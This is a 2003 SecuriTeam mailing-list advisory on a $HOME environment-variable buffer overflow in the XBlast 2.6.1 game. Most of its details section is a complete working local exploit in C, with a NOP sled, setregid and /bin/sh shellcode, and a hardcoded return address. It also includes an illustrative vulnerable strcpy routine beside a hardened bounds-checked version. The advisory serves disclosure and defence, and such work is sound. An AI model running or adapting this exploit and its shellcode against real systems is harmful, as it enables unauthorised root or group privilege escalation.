[EXPL] XBlast Local Root Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 07/28/03

    To: list@securiteam.com
    Date: 28 Jul 2003 14:55:08 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      XBlast Local Root Exploit
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.xblast-center.com/> XBlast is a multi-player arcade game for
    X11R5/R6. The game can be played with at least two players and up to four
    players. It was inspired by the video/computer game
    Bomberman (Dynablaster), which was to my knowledge first programmed for
    NEC's PC Engine/Turbo Grafx. Other (commercial) versions of the original
    game exist for IBM-PC, Atari ST, Amiga, NES, GameBoy, and Super NES."

    A buffer inside XBlast can be overflowed by passing a long $HOME
    environment variable; the overflow allows execution of arbitrary code.
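    The bug class behind this advisory, shown as an added illustration that is not XBlast's code or the advisory's: a fixed-size buffer receives $HOME without a length check, next to a hardened version that bounds every write, rejects a missing or relative HOME, and reports truncation instead of corrupting memory. The buffer size PATH_BUF, the function names and the "/.xblast" suffix are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical fixed-size buffer, standing in for whatever the game copied $HOME into. */
#define PATH_BUF 256

/* Vulnerable pattern (illustration only; nothing in this file calls it):
 * $HOME is copied into a fixed buffer with no length check, so a value longer
 * than the buffer overwrites whatever sits next to it on the stack. */
void unsafe_home_path(char *dst, const char *home)
{
    strcpy(dst, home);          /* unbounded copy: writes strlen(home)+1 bytes */
    strcat(dst, "/.xblast");    /* and then a few more past that */
}

/* Hardened form: the destination size is passed in and every write is bounded.
 * Returns 0 with a NUL-terminated path on success; -1 (and an empty dst) when
 * HOME is missing, not absolute, or would not fit together with the suffix. */
int safe_home_path(char *dst, size_t dstlen, const char *home, const char *suffix)
{
    if (dst == NULL || dstlen == 0)
        return -1;
    dst[0] = '\0';
    if (home == NULL || home[0] != '/' || suffix == NULL)
        return -1;                          /* reject unset, empty or relative HOME */

    int n = snprintf(dst, dstlen, "%s%s", home, suffix);
    if (n < 0 || (size_t)n >= dstlen) {     /* snprintf tells us the length it wanted */
        dst[0] = '\0';                      /* truncated: never use a half-built path */
        return -1;
    }
    return 0;
}

/* A set-id program must treat getenv("HOME") as untrusted input from the
 * invoking user and validate it exactly like any other input. */
int home_path_from_env(char *dst, size_t dstlen, const char *suffix)
{
    return safe_home_path(dst, dstlen, getenv("HOME"), suffix);
}

int main(void)
{
    char path[PATH_BUF];
    if (home_path_from_env(path, sizeof path, "/.xblast") == 0)
        printf("config path: %s\n", path);
    else
        fprintf(stderr, "refusing to use HOME: unset, relative, or too long\n");
    return 0;
}
```

    The hardened function never writes more than dstlen bytes and returns an error on truncation, so an oversized $HOME becomes a refused request rather than a stack overwrite; the caller's job is to check the return value instead of assuming the path was built.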

    DETAILS

    Vulnerable Systems:
     * XBlast version 2.6.1

    /* 0x333xblast => xblast 2.6.1 local exploit
     *
     * xblast could be overflowed by passing a long $HOME
     * env. For more info read advisory @ :
     *
     * http://www.0x333.org/advisories/outsider-003.txt
     *
     * * note * :
     * exploit tested against xblast-2.6.beta-1.i386.rpm
     * under Red Hat Linux 9.0. xblast is not installed
     * +s by default.
     *
     * coded by c0wboy
     *
     * (c) 0x333 Outsider Security Labs / www.0x333.org
     *
     */

    #include <stdio.h>
    #include <stdlib.h>     /* setenv */
    #include <string.h>
    #include <unistd.h>

    #define BIN "/usr/X11R6/bin/xblast"
    #define SIZE 1032

    #define RET 0xbffffb38
    #define NOP 0x90

    unsigned char shellcode[] =

            /* setregid (20,20) shellcode */
            "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
            "\xcd\x80"

            /* exec /bin/sh shellcode */

            "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
            "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

    void banner (void);
    void memret (char *, int, int, int);

    void banner (void)
    {
            fprintf (stdout, "\n\n --- xblast local exploit by c0wboy ---\n");
            fprintf (stdout, " --- Outsiders Se(c)urity Labs / www.0x333.org ---\n\n");

            fprintf (stdout, " [NOW PRESS 'y' TO SPAWN THE SHELL]\n\n");
    }

    /* fill `size' bytes of `buffer' (from offset `align') with the return address */
    void memret (char *buffer, int ret, int size, int align)
    {
            int i;
            int * ptr = (int *) (buffer + align);

            for (i=0; i<size; i+=4)
                    *ptr++ = ret;

            ptr = 0x0;
    }

    int main ()
    {
            int ret = RET;
            char out[SIZE];

            /* buffer layout: 333 NOPs, the shellcode, then the repeated return address */
            memret ((char *)out, ret, SIZE-1, 0);

            memset ((char *)out, NOP, 333);
            memcpy ((char *)out+333, shellcode, strlen((const char *)shellcode));

            /* the oversized value reaches xblast through its $HOME environment */
            setenv ("HOME", out, 1);

            banner ();
            execl (BIN, BIN, (char *) NULL);
            return 1;       /* only reached if execl fails */
    }

    ADDITIONAL INFORMATION

    The information was provided by <mailto:c0wboy@tiscali.it> c0wboy

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
